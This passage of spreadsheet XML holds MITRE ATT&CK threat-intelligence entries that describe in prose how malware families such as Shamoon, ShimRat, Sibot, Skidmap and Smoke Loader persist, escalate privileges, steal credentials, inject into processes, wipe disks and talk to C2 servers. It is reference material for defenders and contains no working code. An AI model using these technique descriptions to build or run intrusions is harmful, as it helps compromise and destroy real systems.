    <t>[Shamoon](https://attack.mitre.org/software/S0140) copies an executable payload to the target system by using [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) and then scheduling an unnamed task to execute the malware.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named “ntssrv” to execute the payload. [Shamoon](https://attack.mitre.org/software/S0140) can also spread via [PsExec](https://attack.mitre.org/software/S0029).(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December19 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) obtains the victim's operating system version and keyboard layout and sends the information to the C2 server.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) obtains the target's IP address and local network segment.(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) will reboot the infected system once the wiping functionality has been completed.(Citation: Unit 42 Shamoon3 2018)(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) obtains the system time and will only activate if it is greater than a preset date.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) can change the modified time for files to evade forensic detection.(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) can impersonate tokens using &lt;code&gt;LogonUser&lt;/code&gt;, &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;, and &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt;.(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) has used HTTP for C2.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named “ntssrv” to execute the payload. Newer versions create the "MaintenaceSrv" and "hdv_725x" services.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) has decompressed data received from the C2 server.(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) has the ability to download and execute additional payloads via a DropBox API.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) can execute arbitrary commands with PowerShell.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SharpStage](https://attack.mitre.org/software/S0546) has the ability to create persistence for the malware using the Registry autorun key and startup folder.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[SharpStage](https://attack.mitre.org/software/S0546) has a persistence component to write a scheduled task for the payload.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) has the ability to capture the victim's screen.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) has checked the system settings to see if Arabic is the configured language.(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SharpStage](https://attack.mitre.org/software/S0546) has used a legitimate web service for evading detection.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) can execute arbitrary commands with the command line.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) can use WMI for execution.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has installed shim databases in the &lt;code&gt;AppPatch&lt;/code&gt; folder.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has hijacked the cryptbase.dll within migwiz.exe to escalate privileges. This prevented the User Access Control window from appearing.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has the capability to upload collected files to a C2.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has decompressed its core DLL using shellcode once an impersonated antivirus component was running on a system.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can use pre-configured HTTP proxies.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has used a secondary C2 location if the first was unavailable.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can uninstall itself from compromised hosts, as well create and modify directories, delete, move, copy, and rename files.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can list directories.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can download additional files.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can impersonate Windows services and antivirus products to avoid detection on compromised systems.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has registered two registry keys for shim databases.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has used Windows API functions to install the service and shim.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can enumerate connected drives for infected host machines.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has been delivered as a package that includes compressed DLL and shellcode payloads within a .dat file.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has installed a registry based start-up key &lt;code&gt;HKCU\Software\microsoft\windows\CurrentVersion\Run&lt;/code&gt; to maintain persistence should other methods fail.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can sleep when instructed to do so by the C2.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444)'s loader has been packed with the compressed [ShimRat](https://attack.mitre.org/software/S0444) core DLL and the legitimate DLL for it to hijack.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) communicated over HTTP and HTTPS with C2 servers.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can be issued a command shell function from the C2.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has installed a Windows service to maintain persistence on victim machines.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) listed all non-privileged and privileged accounts available on the machine.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) used LZ compression to compress initial reconnaissance reports before sending to the C2.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered information automatically, without instruction from a C2, related to the user and host machine that is compiled into a report and sent to the operators.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) sent collected system and network information compiled into a report to an adversary-controlled C2.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) sent generated reports to the C2 via HTTP POST requests.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) had the ability to download additional payloads.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) spoofed itself as &lt;code&gt;AlphaZawgyl_font.exe&lt;/code&gt;, a specialized Unicode font.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) used several Windows API functions to gather information from the infected system.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) encrypted gathered information with a combination of shifting and XOR using a static key.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the local privileges for the infected host.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) listed all running processes on the machine.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered a list of installed software on the infected host.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the operating system name and specific Windows version of an infected machine.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the local proxy, domain, IP, routing tables, mac address, gateway, DNS servers, and DHCP status information from an infected host.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) used the Windows function &lt;code&gt;GetExtendedUdpTable&lt;/code&gt; to detect connected UDP endpoints.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) communicated over HTTP with preconfigured C2 servers.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) can decrypt data received from a C2 and save to a file.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) will delete itself if a certain server response is received.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) will delete an associated registry key if a certain server response is received.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) can download and execute a payload onto a compromised system.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has downloaded a DLL to the &lt;code&gt;C:\windows\system32\drivers\&lt;/code&gt; folder and renamed it with a &lt;code&gt;.sys&lt;/code&gt; extension.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has installed a second-stage script in the &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot&lt;/code&gt; registry key.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has been executed via MSHTA application.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has obfuscated scripts used in execution.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has queried the registry for proxy server information.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has executed downloaded DLLs with &lt;code&gt;rundll32.exe&lt;/code&gt;.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has been executed via a scheduled task.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) checked if the compromised system is configured to use proxies.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has retrieved a GUID associated with a present LAN connection on a compromised machine.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) executes commands using VBScript.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) communicated with its C2 server via HTTP GET requests.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has used a legitimate compromised website to download DLLs to the victim's machine.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has used WMI to discover network connections and configurations. [Sibot](https://attack.mitre.org/software/S0589) has also used the Win32_Process class to execute a malicious DLL.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>Domain Controller Authentication</t>
  </si>
  <si>
    <t>[Skeleton Key](https://attack.mitre.org/software/S0007) is used to patch an enterprise domain controller authentication process with a backdoor password. It allows adversaries to bypass the standard authentication system to use a defined password for all accounts authenticating to that domain controller.(Citation: Dell Skeleton)</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has installed itself via crontab.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has the ability to download, unpack, and decrypt tar.gz files .(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to set SELinux to permissive mode.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has checked for the existence of specific files including &lt;code&gt;/usr/sbin/setenforce&lt;/code&gt; and &lt;code&gt; /etc/selinux/config&lt;/code&gt;. It also has the ability to monitor the cryptocurrency miner file and process. (Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has the ability to download files on an infected host.(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to install several loadable kernel modules (LKMs) on infected machines.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has created a fake &lt;code&gt;rm&lt;/code&gt; binary to replace the legitimate Linux binary.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has encrypted it's main payload using 3DES.(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has monitored critical processes to ensure resiliency.(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and fake network and CPU-related statistics to make the CPU load of the infected machine always appear low.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to add the public key of its handlers to the &lt;code&gt;authorized_keys&lt;/code&gt; file to maintain persistence on an infected host.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has the ability to check if &lt;code&gt;/usr/sbin/setenforce&lt;/code&gt; exists. This file controls what mode SELinux is in.(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to check whether the infected system’s OS is Debian or RHEL/CentOS to determine which cryptocurrency miner it should use.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has used &lt;code&gt;pm.sh&lt;/code&gt; to download and install its main payload.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) searches for files named logins.json to parse for credentials.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) searches for credentials stored from web browsers.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) deobfuscates its code.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) recursively searches through directories for files.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) downloads a new version of itself once it has installed. It also downloads additional plugins.(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.).(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) uses a simple one-byte XOR method to obfuscate values in the malware.(Citation: Malwarebytes SmokeLoader 2016)(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) spawns a new copy of c:\windows\syswow64\explorer.exe and then replaces the executable code in memory with malware.(Citation: Malwarebytes SmokeLoader 2016)(Citation: Microsoft Dofoil 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) injects into the Internet Explorer process.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) adds a Registry Run key for persistence and adds a script in the Startup folder to deploy the payload.(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) launches a scheduled task.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) scans processes to perform anti-VM checks. (Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) adds a Visual Basic script in the Startup folder to deploy the payload.(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) uses HTTP for C2.(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) creates a suspended svchost process and injects its DLL into it.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) can write and execute PowerShell scripts.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) can list all running processes.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) can start SOCKS proxy threads.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) can take screenshots.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can decode and decrypt exfiltrated data sent to C2.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can enumerate domain accounts via &lt;code&gt;net.exe user /domain&lt;/code&gt;.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can enumerate domain groups by executing &lt;code&gt;net.exe group /domain&lt;/code&gt;.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can gain access by exploiting a Sangfor SSL VPN vulnerability that allows for the placement and delivery of malicious update binaries.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) has the ability to list directories.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can download additional payloads from C2.(Citation: CISA SoreFang July 2016)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can collect usernames from the local system via &lt;code&gt;net.exe user&lt;/code&gt;.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) has the ability to encode and RC6 encrypt data sent to C2.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can enumerate processes on a victim machine through use of [Tasklist](https://attack.mitre.org/software/S0057).(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can gain persistence through use of scheduled tasks.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can collect the hostname, operating system configuration, product ID, and disk space on victim machines by executing [Systeminfo](https://attack.mitre.org/software/S0096).(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can collect the TCP/IP, DNS, DHCP, and network adapter configuration on a compromised host via &lt;code&gt;ipconfig.exe /all&lt;/code&gt;.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can use HTTP in C2 communications.(Citation: CISA SoreFang July 2016)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has used a custom XOR algorithm to decrypt the payload.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has exfiltrated data over the C2 channel.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has been packed with Enigma Protector to obfuscate its contents.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has encoded communications with the C2 server with base64.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) can collect the hostname, keyboard layout, and language from the system.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has run the whoami command and has a built-in command to identify the user logged in.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has used a splash screen to check whether an user actively clicks on the screen before running malicious code.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has used HTTP POST requests to communicate with its C2 server to receive commands.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) can use cmd.exe to run commands.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses Perl scripts.(Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses cron tasks to ensure persistence. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3/4/5/6, and the Hadoop YARN ResourceManager. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) deletes files to remove evidence on the machine. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) downloads and executes additional files from a remote server. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) checks for availability of specific ports on servers.(Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) encodes its second-stage payload with Base64. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) can perform brute forcing using a pre-defined list of usernames and passwords in an attempt to log in to administrative panels. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses Python scripts.(Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) encodes C&amp;C communication using Base64. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;cat /proc/cpuinfo | grep -c “cpu family” 2&gt;&amp;1&lt;/code&gt; command to gather system information. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;ifconfig -a&lt;/code&gt; command. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;arp -a&lt;/code&gt; command. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;whoami&lt;/code&gt; command. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses POST and GET requests over HTTP to communicate with its main C&amp;C server. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) contains a feature to manipulate process privileges and tokens.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) identifies and kills anti-malware processes.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) has a hard-coded primary and backup C2 string.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>To establish persistence, [SslMM](https://attack.mitre.org/software/S0058) identifies the Start Menu Startup directory and drops a link to its own executable disguised as an “Office Start,” “Yahoo Talk,” “MSN Gaming Z0ne,” or “MSN Talk” shortcut.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) sends information to its hard-coded C2, including OS version, service pack information, processor speed, system name, and OS install date.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) sends the logged-on username to its hard-coded C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Starloader](https://attack.mitre.org/software/S0188) decrypts and executes shellcode from a file called Stars.jps.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[Starloader](https://attack.mitre.org/software/S0188) has masqueraded as legitimate software update packages such as Adobe Acrobat Reader and Intel.(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has a disk wiper module that targets files other than those in the Windows directory.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) can wipe the accessible physical or logical drives of the infected machine.(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) can wipe the master boot record of an infected computer.(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has been observed deleting the temporary files once they fulfill their task.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
